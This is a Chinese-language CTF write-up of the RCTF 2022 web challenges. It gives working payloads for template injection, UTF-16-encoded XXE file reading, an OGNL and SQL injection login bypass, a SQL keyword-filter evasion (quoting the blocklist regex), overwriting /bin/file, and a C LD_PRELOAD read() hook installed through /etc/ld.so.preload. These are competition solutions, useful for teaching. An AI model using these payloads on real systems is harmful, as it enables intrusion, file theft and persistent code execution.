2022RCTF

web wp

easy upload

content在mb_detect_encoding之后要被判断为base64，然后解成乱码，绕过检测，最后写入
后缀经过mb_detect_encoding检测为BASE64后，通过mb_strtolower加密成pHo=，绕过php检测

filechecker_mini

https://blog.zeddyu.info/2020/01/08/36c3-web/#other-file

payload

#!/{{config.__class__.__init__.__globals__['os'].popen('nl /flag').read()}}

FLAG：RCTF{Just_A_5mall_Tr1ck_mini1i1i1__Fl4g_Y0u_gOtt777!!!}

ezbypass

• xxe
• ognl

ico后缀的绕过，日常注意一下也能发现用 ; 绕过

http://url/index;1.ico

利用mybatis的ognl引入单引号绕过登录，然后就是对payload进行UTF-16LE或者UTF_16BE编码绕过DOCTYPE

public static void main(String[] args) throws Exception {
        String payload = "<?xml version=\"1.0\"?>\n" +
                "<!DOCTYPE foo [  \n" +
                "<!ENTITY xxe SYSTEM \"file:///flag\">]>" +
                "<foo>&xxe;</foo>";
        byte[] bytes = payload.getBytes(StandardCharsets.UTF_16LE);
        String poc =  Base64.getEncoder().encodeToString(bytes);//base64-poc
        System.out.println(poc);
        String res = xxe(poc,"no",new String[]{"java.io.ByteArrayInputStream","[B","org.xml.sax.InputSource","java.io.InputStream"});
        System.out.println(res);
    }

payload

password=1${@java.lang.Character@toString(39)}or(1))%23&type=no&poc=PAA%2FAHgAbQBsACAAdgBlAHIAcwBpAG8AbgA9ACIAMQAuADAAIgA%2FAD4ACgA8ACEARABPAEMAVABZAFAARQAgAGYAbwBvACAAWwAgACAACgA8ACEARQBOAFQASQBUAFkAIAB4AHgAZQAgAFMAWQBTAFQARQBNACAAIgBmAGkAbABlADoALwAvAC8AZgBsAGEAZwAiAD4AXQA%2BADwAZgBvAG8APgAmAHgAeABlADsAPAAvAGYAbwBvAD4A&yourclasses=java.io.ByteArrayInputStream,[B,org.xml.sax.InputSource,java.io.InputStream

FLAG：RCTF{eeezzzzz222bypassss5555ovo}

filechecker_plus

发现能覆盖/bin/file

尝试覆盖为恶意ELF文件却一直报Segmentation Fault错误。直接覆盖为bash脚本

bp里需要去除\r

FLAG：RCTF{III_W4nt_Gir1Friendssssss_Thi5_Christm4ssss~~~~}

ruoyi

反编译jar，github下载源码，sql注入审计流程，搜 ${

createTable的sql语句直接拿来拼接，需要绕过 filterKeyword

将关键字分割，但是分割之后跟上的是%20，所以构造select %09 即可绕过

SQL_REGEX = "select |insert |delete |update |drop |count |exec |chr |mid |master |truncate |char |and |declare ";

payload

create table aaa select%09extractvalue(1,concat(0x7e,substr((select%09flag from flag),1,16),0x7e,database())) as c from flag;

FLAG：RCTF{9848a68fa6f8ff435839acfbb2a0526f}

filechecker_pro_max

• LD_PRELOAD
• /etc/ld.so.preload

条件竞争上传 /etc/ld.so.preload ->hook read->劫持/bin/file成功

https://h0mbre.github.io/Learn-C-By-Creating-A-Rootkit/

https://payloads.online/archivers/2020-01-01/1/

hack.c

#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
#include <stdlib.h>

#define BUFFER_SIZE 100
#define COMMAND_NUM 5

static int called = 0;
static ssize_t (*old_read) (int fd, void *buf, size_t count);

int check_file_line(char * filename){
	int file_line = 0;
	char buffer[BUFFER_SIZE];
	FILE *fp = NULL;
	fp = fopen(filename,"r");
	if(fp==NULL){
		return file_line;
	}
	while(fgets(buffer,BUFFER_SIZE,fp)!= NULL){
		file_line ++;
	}
	fclose(fp);
	return file_line;
}

void add_file_line(char * filename){
	FILE * fp = NULL;
	fp = fopen(filename,"a+");
	if(fp == NULL){
		return;
	}
	fputs("1\n",fp);
	fclose(fp);
}

ssize_t read(int fd, void *buf, size_t count)
{
    char * filename = "/tmp/err.log";
    int file_lines = 0;

#ifdef DEBUG
  printf ("read hooked.\n");
#endif

    add_file_line(filename);
    file_lines = check_file_line(filename);
    
  if(file_lines % COMMAND_NUM == 0){
  	system("cat /flag");
  }

  if (old_read == NULL)
    old_read = dlsym (RTLD_NEXT, "read");

  return old_read (fd, buf, count);
}

编译

gcc hack.c -o hack.so -fPIC -shared -ldl -D_GNU_SOURCE

上传

/etc/ld.so.preload 内容为 /tmp/hack.so 和 /tmp/hack.so 内容为编译的hack.so

竞争

FLAG：RCTF{I_Giveeeeeee_Y0oOu_Fl4gsssss_You_G1ve_M3_GirlFriendsssssssssss}